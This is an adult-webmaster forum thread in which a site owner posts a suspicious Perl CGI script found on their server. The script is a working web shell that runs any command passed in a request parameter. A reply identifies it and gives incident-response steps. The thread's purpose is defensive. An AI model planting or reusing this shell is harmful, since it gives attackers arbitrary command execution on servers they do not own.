GoFuckYourself.com - Adult Webmaster Forum - What would this cgi code do?

- Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)

- - What would this cgi code do? (https://gfy.com/showthread.php?t=263475)

What would this cgi code do?

Just found this cgi file on my server... looks a bit suspicious to me...

Code:

#!/usr/bin/perl 

use CGI qw(:standard); print header; my $k=param("g"); my $a=param("a"); if ($a || $k) {$l=`$k 2>&1`; print start_form,textarea("g",$k,3,50); print submit("fuck base-x"); print end_form; print pre($l);} print $ENV{"NS2.ISPRIME.COM"};

Can anyone tell me what it does?

Thanks!

it loads hot chicks from isprime.. really!! try it!! :Graucho

not in that size font i cant, i hate those code tags

dude this is very serious

but i dont have an idea what is it :(

That script lets someone run commands on your
server - any commands they want.

Take careful note of the timestamps on that file.
Download it.
Delete it.
Notify your host/admin right away, letting them know the
file timestamps so that they can look in the logs to
see what happened around the time that file got created.
Pray that your host/admin had CGI running as unprivileged
user and not as your username.
If you don't have a good admin, get one now. A very good one.

Someone had to hack your site (or be given FTP access)
in order to put that script there. You'll need to figure
out how they did it. Apache and FTP logs will show FTP logins
and which existing scripts were hit around the time
that script was created. You'll need to secure that
so they don't do it again.
Probably, they also used that script
to create more security
holes you'll need to find and patch.

I thought it was suspect :(

My server had been fucking up a lot lately and my host traced it to this file. It's gone now of course!

I'll ask them to have a look at the time stamps.

Thanks raymor